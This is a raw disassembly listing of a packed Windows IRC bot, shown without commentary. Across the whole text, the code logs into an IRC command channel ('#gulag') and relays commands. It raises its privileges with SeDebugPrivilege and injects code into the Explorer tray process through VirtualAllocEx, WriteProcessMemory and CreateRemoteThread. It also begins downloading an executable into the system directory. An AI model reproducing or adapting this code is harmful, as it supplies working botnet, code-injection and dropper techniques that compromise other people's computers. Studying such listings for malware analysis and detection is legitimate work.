lea eax, [ebp+var_21B0]
push offset loc_31304120
push eax
call sub_3130373E ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31301AC3: ; CODE XREF: sub_31301631+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31301AC3
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31303744 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31303744 ; memset
add esp, 18h
jmp loc_313018C8
; ---------------------------------------------------------------------------
loc_31301B17: ; CODE XREF: sub_31301631+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31304788
push eax
call sub_3130373E ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_3130373E ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_31304808
push eax
call sub_3130373E ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_31301B6F: ; CODE XREF: sub_31301631+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_31301B7C: ; CODE XREF: sub_31301631+1AD�j
; sub_31301631+1E1�j ...
push 2
push [ebp+var_4]
call dword_31301174 ; shutdown
loc_31301B87: ; CODE XREF: sub_31301631+166�j
push [ebp+var_4]
call dword_3130118C ; closesocket
pop esi
loc_31301B91: ; CODE XREF: sub_31301631+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_31301631 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31301B98 proc near ; CODE XREF: UPX0:loc_31302DFB�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_313010DC ; GetModuleHandleA
mov esi, dword_313010D8
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_31301C1C
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_31301C1C
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_31301C1C
lea eax, [ebp+var_C]
push eax
push 20h
call dword_313010D4 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_31301C1C: ; CODE XREF: sub_31301B98+28�j
; sub_31301B98+37�j ...
pop edi
pop esi
leave
retn
sub_31301B98 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31301C20 proc near ; CODE XREF: UPX0:31302E0F�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31304FFC
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_313010DC ; GetModuleHandleA
mov esi, dword_313010D8
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31301C67
loc_31301C63: ; CODE XREF: sub_31301C20+54�j
push 1
jmp short loc_31301CB8
; ---------------------------------------------------------------------------
loc_31301C67: ; CODE XREF: sub_31301C20+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_31301C63
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31301128 ; FindWindowA
test eax, eax
jnz short loc_31301C95
call dword_3130112C ; GetForegroundWindow
test eax, eax
jnz short loc_31301C95
push 2
jmp short loc_31301CB8
; ---------------------------------------------------------------------------
loc_31301C95: ; CODE XREF: sub_31301C20+65�j
; sub_31301C20+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31301130 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_313010E4 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_31301CBB
push 3
loc_31301CB8: ; CODE XREF: sub_31301C20+45�j
; sub_31301C20+73�j
pop eax
jmp short loc_31301D26
; ---------------------------------------------------------------------------
loc_31301CBB: ; CODE XREF: sub_31301C20+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_313010A0
test eax, eax
jz short loc_31301D19
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_313010E0 ; WriteProcessMemory
push dword_31304FD0
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31301D05
push eax
call esi ; CloseHandle
jmp short loc_31301D20
; ---------------------------------------------------------------------------
loc_31301D05: ; CODE XREF: sub_31301C20+DE�j
push offset aUterm_9 ; "uterm_9"
call sub_31302A9B
pop ecx
mov [ebp+var_4], 5
jmp short loc_31301D20
; ---------------------------------------------------------------------------
loc_31301D19: ; CODE XREF: sub_31301C20+B2�j
mov [ebp+var_4], 4
loc_31301D20: ; CODE XREF: sub_31301C20+E3�j
; sub_31301C20+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_31301D26: ; CODE XREF: sub_31301C20+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31301C20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31301D2B proc near ; CODE XREF: sub_31301DB0+25�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31301D5E
add ebx, 1Ah
loc_31301D5E: ; CODE XREF: sub_31301D2B+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31301110
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31301D88
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31301DAB
; ---------------------------------------------------------------------------
loc_31301D88: ; CODE XREF: sub_31301D2B+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31301DA8
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31301DAB
; ---------------------------------------------------------------------------
loc_31301DA8: ; CODE XREF: sub_31301D2B+68�j
mov al, [ebp+arg_0]
loc_31301DAB: ; CODE XREF: sub_31301D2B+5B�j
; sub_31301D2B+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31301D2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31301DB0 proc near ; CODE XREF: sub_31302755+F8�p
; sub_31302755+139�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_31301E0B
mov edi, [ebp+arg_0]
push ebx
loc_31301DC5: ; CODE XREF: sub_31301DB0+56�j
mov bl, al
inc [ebp+arg_4]
mov eax, esi
mov byte ptr [ebp+arg_0], bl
neg eax
push eax
push [ebp+arg_0]
call sub_31301D2B
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_31301DEF
cmp bl, 7Ah
jg short loc_31301DEF
movsx esi, bl
sub esi, 61h
loc_31301DEF: ; CODE XREF: sub_31301DB0+32�j
; sub_31301DB0+37�j
cmp bl, 41h
jl short loc_31301DFF
cmp bl, 5Ah
jg short loc_31301DFF
movsx esi, bl
sub esi, 41h
loc_31301DFF: ; CODE XREF: sub_31301DB0+42�j
; sub_31301DB0+47�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_31301DC5
pop ebx
jmp short loc_31301E0E
; ---------------------------------------------------------------------------
loc_31301E0B: ; CODE XREF: sub_31301DB0+F�j
mov edi, [ebp+arg_0]
loc_31301E0E: ; CODE XREF: sub_31301DB0+59�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_31301DB0 endp
; =============== S U B R O U T I N E =======================================
sub_31301E15 proc near ; CODE XREF: UPX0:31302498�p
push esi
mov esi, ecx
push 20001h
call sub_31303717
mov [esi+2Ch], eax
pop ecx
mov eax, esi
pop esi
retn
sub_31301E15 endp
; =============== S U B R O U T I N E =======================================
sub_31301E2A proc near ; CODE XREF: UPX0:31302501�p
; UPX0:31302554�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push 27h
push [esp+8+arg_0]
lea eax, [esi+4]
push eax
call dword_313010AC ; lstrcpyn
mov eax, [esp+4+arg_4]
mov [esi+58h], eax
pop esi
retn 8
sub_31301E2A endp
; ---------------------------------------------------------------------------
loc_31301E48: ; CODE XREF: UPX0:313037C6�j
push esi
mov esi, ecx
lea eax, [esi+4]
push eax
call sub_3130372B
push dword ptr [esi+2Ch]
call sub_3130372B
pop ecx
pop ecx
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_31301E60 proc near ; CODE XREF: UPX0:3130251F�p
; UPX0:31302572�p
var_138 = byte ptr -138h
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 138h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
push ebx
push 1
mov esi, ecx
push 2
call dword_31301178 ; socket
mov [esi+5Ch], eax
lea eax, [esi+4]
push eax
call sub_31302B6B
mov [esi+64h], eax
mov ax, [esi+58h]
pop ecx
lea edi, [esi+60h]
push eax
mov word ptr [edi], 2
call dword_3130117C ; htons
push 10h
push edi
push dword ptr [esi+5Ch]
mov [esi+62h], ax
call dword_31301170 ; connect
test eax, eax
jnz loc_31302065
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31302065
mov ecx, [esi+2Ch]
and [ecx+eax], bl
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_313020A2
lea eax, [esp+148h+var_138]
push 9
push eax
call sub_31302AE5
mov ebp, dword_31301134
lea eax, [esp+150h+var_138]
push eax
lea eax, [esp+154h+var_12C]
push offset aPassS ; "PASS %s\r\n"
push eax
call ebp ; wsprintfA
mov edi, dword_313010D0
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push ebx
mov ebx, dword_313010CC
push eax
call ebx ; lstrlen
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_31301194 ; send
push [esp+148h+arg_0]
lea eax, [esp+14Ch+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlen
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_31301194 ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31302065
mov ecx, [esi+2Ch]
push 64h
and byte ptr [ecx+eax], 0
call edi ; Sleep
loc_31301F89: ; CODE XREF: sub_31301E60+1AD�j
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_313020A2
push offset aAlready ; "already"
push dword ptr [esi+2Ch]
call dword_3130110C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31302012
push [esp+148h+arg_4]
push [esp+14Ch+arg_0]
call sub_31302AE5
push [esp+150h+arg_0]
lea eax, [esp+154h+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlen
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_31301194 ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_31302065
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
jmp loc_31301F89
; ---------------------------------------------------------------------------
loc_31302012: ; CODE XREF: sub_31301E60+145�j
push [esp+148h+arg_8]
lea eax, [esp+14Ch+var_12C]
push [esp+14Ch+arg_0]
push offset aUserS8S ; "USER %s 8 * :%s\r\n"
push eax
call ebp ; wsprintfA
add esp, 10h
push 64h
call edi ; Sleep
xor edi, edi
lea eax, [esp+148h+var_12C]
push edi
push eax
call ebx ; lstrlen
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_31301194 ; send
push edi
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_31302073
loc_31302065: ; CODE XREF: sub_31301E60+4E�j
; sub_31301E60+6B�j ...
push dword ptr [esi+5Ch]
call dword_3130118C ; closesocket
push 1
pop eax
jmp short loc_31302095
; ---------------------------------------------------------------------------
loc_31302073: ; CODE XREF: sub_31301E60+203�j
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_313020A2
mov [esi+180h], edi
mov [esi+7Ch], edi
mov [esi+70h], edi
mov [esi+74h], edi
xor eax, eax
loc_31302095: ; CODE XREF: sub_31301E60+211�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 138h
retn 0Ch
sub_31301E60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_313020A2 proc near ; CODE XREF: sub_31301E60+7C�p
; sub_31301E60+12E�p ...
var_190 = byte ptr -190h
var_64 = byte ptr -64h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
push ebx
push esi
push edi
push offset aPing ; "PING"
push [ebp+arg_0]
mov ebx, ecx
call dword_3130110C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_3130211C
mov esi, dword_313010CC
lea edi, [eax+4]
push edi
call esi ; lstrlen
dec eax
cmp eax, 63h
jle short loc_313020DB
push 1
pop eax
jmp short loc_3130211E
; ---------------------------------------------------------------------------
loc_313020DB: ; CODE XREF: sub_313020A2+32�j
push eax
lea eax, [ebp+var_64]
push edi
push eax
call dword_313010AC ; lstrcpyn
lea eax, [ebp+var_64]
push eax
lea eax, [ebp+var_190]
push offset aPongS ; "PONG%s\r\n"
push eax
call dword_31301134 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_190]
push 0
push eax
call esi ; lstrlen
push eax
lea eax, [ebp+var_190]
push eax
push dword ptr [ebx+5Ch]
call dword_31301194 ; send
loc_3130211C: ; CODE XREF: sub_313020A2+20�j
xor eax, eax
loc_3130211E: ; CODE XREF: sub_313020A2+37�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_313020A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302125 proc near ; CODE XREF: UPX0:313025C0�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 12Ch
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12C]
mov esi, ecx
push offset aJoinS ; "JOIN %s\r\n"
push eax
call dword_31301134 ; wsprintfA
mov edi, dword_313010D0
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call dword_313010CC ; lstrlen
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [esi+5Ch]
call dword_31301194 ; send
push 64h
call edi ; Sleep
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31301190 ; recv
mov ecx, [esi+2Ch]
mov [esi], eax
and byte ptr [ecx+eax], 0
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_313021EE
test eax, eax
jz short loc_313021EE
push 64h
call edi ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_313020A2
mov edi, dword_3130110C
push offset a451 ; "451"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_313021C7
push 3
jmp short loc_313021F0
; ---------------------------------------------------------------------------
loc_313021C7: ; CODE XREF: sub_31302125+9C�j
push offset aPing ; "PING"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_313021DB
push 4
jmp short loc_313021F0
; ---------------------------------------------------------------------------
loc_313021DB: ; CODE XREF: sub_31302125+B0�j
push 23h
add esi, 30h
push [ebp+arg_0]
push esi
call dword_313010AC ; lstrcpyn
xor eax, eax
jmp short loc_313021F1
; ---------------------------------------------------------------------------
loc_313021EE: ; CODE XREF: sub_31302125+74�j
; sub_31302125+78�j
push 2
loc_313021F0: ; CODE XREF: sub_31302125+A0�j
; sub_31302125+B4�j
pop eax
loc_313021F1: ; CODE XREF: sub_31302125+C7�j
pop edi
pop esi
leave
retn 4
sub_31302125 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_313021F7 proc near ; CODE XREF: sub_31302260+72�p
; UPX0:3130261C�p
var_14C = byte ptr -14Ch
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 14Ch
push esi
mov esi, ecx
call dword_31301120 ; rand
sub eax, 3
and eax, 7
push eax
lea eax, [ebp+var_20]
push eax
call sub_31302AE5
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14C]
push offset aQuitS ; "QUIT %s\r\n"
push eax
call dword_31301134 ; wsprintfA
add esp, 14h
lea eax, [ebp+var_14C]
push 0
push eax
call dword_313010CC ; lstrlen
push eax
lea eax, [ebp+var_14C]
push eax
push dword ptr [esi+5Ch]
call dword_31301194 ; send
push dword ptr [esi+5Ch]
call dword_3130118C ; closesocket
xor eax, eax
pop esi
leave
retn
sub_313021F7 endp
; =============== S U B R O U T I N E =======================================
sub_31302260 proc near ; CODE XREF: UPX0:31302604�p
mov eax, offset sub_313037B4
call sub_31303790
sub esp, 110h
push ebx
push esi
push edi
mov edi, dword_313010E8
mov esi, ecx
mov [ebp-10h], esp
mov [ebp-14h], esi
call edi ; GetTickCount
mov [ebp-18h], eax
mov eax, [esi+5Ch]
mov dword ptr [ebp-11Ch], 1
mov [ebp-118h], eax
xor ebx, ebx
loc_3130229B: ; CODE XREF: sub_31302260+DE�j
call sub_31302BE5
test eax, eax
jz short loc_313022D7
push ebx
push ebx
lea eax, [ebp-11Ch]
push ebx
push eax
push 1
call dword_31301168 ; select
cmp eax, 0FFFFFFFFh
jz short loc_313022D7
mov [ebp-4], ebx
call edi ; GetTickCount
mov ecx, [ebp+8]
sub eax, [ebp-18h]
imul ecx, 0EA60h
cmp eax, ecx
jbe short loc_313022EA
mov ecx, esi
call sub_313021F7
loc_313022D7: ; CODE XREF: sub_31302260+42�j
; sub_31302260+59�j ...
xor eax, eax
loc_313022D9: ; CODE XREF: sub_31302260+F8�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_313022EA: ; CODE XREF: sub_31302260+6E�j
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_31302355
mov ecx, [esi+2Ch]
push 64h
mov [eax+ecx], bl
call dword_313010D0 ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_313020A2
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31302755
cmp eax, ebx
jnz short loc_313022D7
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_31302BE5
test eax, eax
jz short loc_313022D7
push 64h
call dword_313010D0 ; Sleep
jmp loc_3130229B
; ---------------------------------------------------------------------------
loc_31302343: ; DATA XREF: UPX0:3130382C�o
mov eax, [ebp-14h]
push dword ptr [eax+5Ch]
call dword_3130118C ; closesocket
mov eax, offset loc_31302355
retn
; ---------------------------------------------------------------------------
loc_31302355: ; CODE XREF: sub_31302260+A1�j
; DATA XREF: sub_31302260+EF�o
push 1
pop eax
jmp loc_313022D9
sub_31302260 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3130235D proc near ; CODE XREF: sub_31302755+9D�p
; sub_31302755+2BA�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 12Ch
push ebx
push esi
mov esi, dword_313010CC
push edi
push [ebp+arg_0]
mov edi, ecx
call esi ; lstrlen
push [ebp+arg_4]
mov ebx, eax
call esi ; lstrlen
add ebx, eax
cmp ebx, 10Eh
jle short loc_3130238C
push 1
pop eax
jmp short loc_313023CD
; ---------------------------------------------------------------------------
loc_3130238C: ; CODE XREF: sub_3130235D+28�j
push [ebp+arg_4]
lea eax, [ebp+var_12C]
push [ebp+arg_0]
push offset aPrivmsgSS ; "PRIVMSG %s %s\r\n"
push eax
call dword_31301134 ; wsprintfA
add esp, 10h
push 64h
call dword_313010D0 ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call esi ; lstrlen
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [edi+5Ch]
call dword_31301194 ; send
xor eax, eax
loc_313023CD: ; CODE XREF: sub_3130235D+2D�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_3130235D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_313023D4 proc near ; CODE XREF: UPX0:313024AE�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
lea eax, [ebp+var_10]
push eax
call dword_3130109C ; GetSystemTime
movzx eax, [ebp+var_10]
movzx ecx, [ebp+var_E]
lea eax, [eax+eax*2]
add eax, ecx
movzx ecx, [ebp+var_A]
add eax, ecx
push eax
call dword_31301100 ; srand
mov eax, [ebp+arg_0]
push 7
mov byte ptr [eax], 23h
inc eax
push eax
call sub_31302AE5
push 8
push [ebp+arg_4]
call sub_31302AE5
add esp, 14h
call dword_31301120 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
mov [eax], edx
call sub_31302A6D
leave
retn
sub_313023D4 endp
; ---------------------------------------------------------------------------
loc_31302432: ; DATA XREF: sub_31302E37+77�o
mov eax, offset loc_313037CB
call sub_31303790
sub esp, 1E4h
push ebx
push esi
xor ebx, ebx
push edi
mov dword_31304F98, ebx
call sub_31302A6D
mov esi, dword_31301120
call esi ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp-4Ch]
add edx, ecx
push edx
push eax
call sub_31302AE5
cmp ds:dword_31305008, ebx
mov edi, dword_313010EC
pop ecx
pop ecx
jz short loc_31302487
lea eax, [ebp-4Ch]
push offset a_ ; "_"
push eax
call edi ; lstrcat
loc_31302487: ; CODE XREF: UPX0:3130247A�j
lea eax, [ebp-4Ch]
push offset a9 ; "9"
push eax
call edi ; lstrcat
lea ecx, [ebp-1F0h]
call sub_31301E15
mov [ebp-4], ebx
loc_313024A0: ; CODE XREF: UPX0:31302610�j
; UPX0:31302636�j
push offset dword_31304F9C
lea eax, [ebp-18h]
push offset dword_31304FA0
push eax
call sub_313023D4
add esp, 0Ch
loc_313024B6: ; CODE XREF: UPX0:313024CA�j
call sub_31302BE5
test eax, eax
jnz short loc_313024CC
push 3E8h
call dword_313010D0 ; Sleep
jmp short loc_313024B6
; ---------------------------------------------------------------------------
loc_313024CC: ; CODE XREF: UPX0:313024BD�j
xor ebx, ebx
call esi ; rand
push 7
cdq
pop ecx
idiv ecx
lea eax, [ebp-6Ch]
add edx, 5
push edx
push eax
call sub_31302AE5
pop ecx
xor edi, edi
pop ecx
loc_313024E7: ; CODE XREF: UPX0:3130252C�j
push 1A0Bh
mov eax, edi
push 2
cdq
pop ecx
idiv ecx
lea ecx, [ebp-1F0h]
push off_31304BC0[edx*4]
call sub_31301E2A
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_313010CC ; lstrlen
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-1F0h]
call sub_31301E60
test eax, eax
jz short loc_31302583
inc edi
cmp edi, 8
jl short loc_313024E7
xor edi, edi
loc_31302530: ; CODE XREF: UPX0:3130257F�j
call sub_31302BE5
test eax, eax
jz short loc_31302591
push 1A0Bh
call esi ; rand
push 0Dh
xor edx, edx
pop ecx
div ecx
lea ecx, [ebp-1F0h]
push off_31304BC0[edx*4]
call sub_31301E2A
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_313010CC ; lstrlen
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-1F0h]
call sub_31301E60
test eax, eax
jz short loc_3130258E
inc edi
cmp edi, 34h
jb short loc_31302530
jmp short loc_31302591
; ---------------------------------------------------------------------------
loc_31302583: ; CODE XREF: UPX0:31302526�j
push 1
pop ebx
mov dword_31304F98, ebx
jmp short loc_3130259A
; ---------------------------------------------------------------------------
loc_3130258E: ; CODE XREF: UPX0:31302579�j
push 1
pop ebx
loc_31302591: ; CODE XREF: UPX0:31302537�j
; UPX0:31302581�j
cmp dword_31304F98, 0
jz short loc_313025A9
loc_3130259A: ; CODE XREF: UPX0:3130258C�j
lea eax, [ebp-18h]
push offset aGulag ; "#gulag"
push eax
call dword_31301090 ; lstrcpy
loc_313025A9: ; CODE XREF: UPX0:31302598�j
test ebx, ebx
jz short loc_31302621
call sub_31302BE5
test eax, eax
jz short loc_31302621
loc_313025B6: ; CODE XREF: UPX0:313025DB�j
lea eax, [ebp-18h]
lea ecx, [ebp-1F0h]
push eax
call sub_31302125
test eax, eax
jz short loc_313025DD
push 3E8h
call dword_313010D0 ; Sleep
call sub_31302BE5
test eax, eax
jnz short loc_313025B6
loc_313025DD: ; CODE XREF: UPX0:313025C7�j
cmp dword_31304F98, 0
jz short loc_313025ED
mov edx, 0A8C0h
jmp short loc_313025FD
; ---------------------------------------------------------------------------
loc_313025ED: ; CODE XREF: UPX0:313025E4�j
call esi ; rand
cdq
mov ecx, 1F4h
idiv ecx
add edx, 578h
loc_313025FD: ; CODE XREF: UPX0:313025EB�j
push edx
lea ecx, [ebp-1F0h]
call sub_31302260
call sub_31302BE5
test eax, eax
jz loc_313024A0
lea ecx, [ebp-1F0h]
call sub_313021F7
loc_31302621: ; CODE XREF: UPX0:313025AB�j
; UPX0:313025B4�j
call esi ; rand
push 0Ah
cdq
pop ecx
idiv ecx
imul edx, 0EA60h
push edx
call dword_313010D0 ; Sleep
jmp loc_313024A0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3130263B proc near ; CODE XREF: sub_31302755+5F�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31301140 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_31302666
push 1
jmp loc_313026FC
; ---------------------------------------------------------------------------
loc_31302666: ; CODE XREF: sub_3130263B+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_313010B4 ; GetSystemDirectoryA
mov edi, dword_313010EC
lea eax, [ebp+var_110]
push offset asc_31304DDC ; "\\"
push eax
call edi ; lstrcat
lea eax, [ebp+var_110]
push 6
push eax
call dword_313010CC ; lstrlen
lea eax, [ebp+eax+var_110]
push eax
call sub_31302AE5
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset a_exe ; ".exe"
push eax
call edi ; lstrcat
push esi
push esi
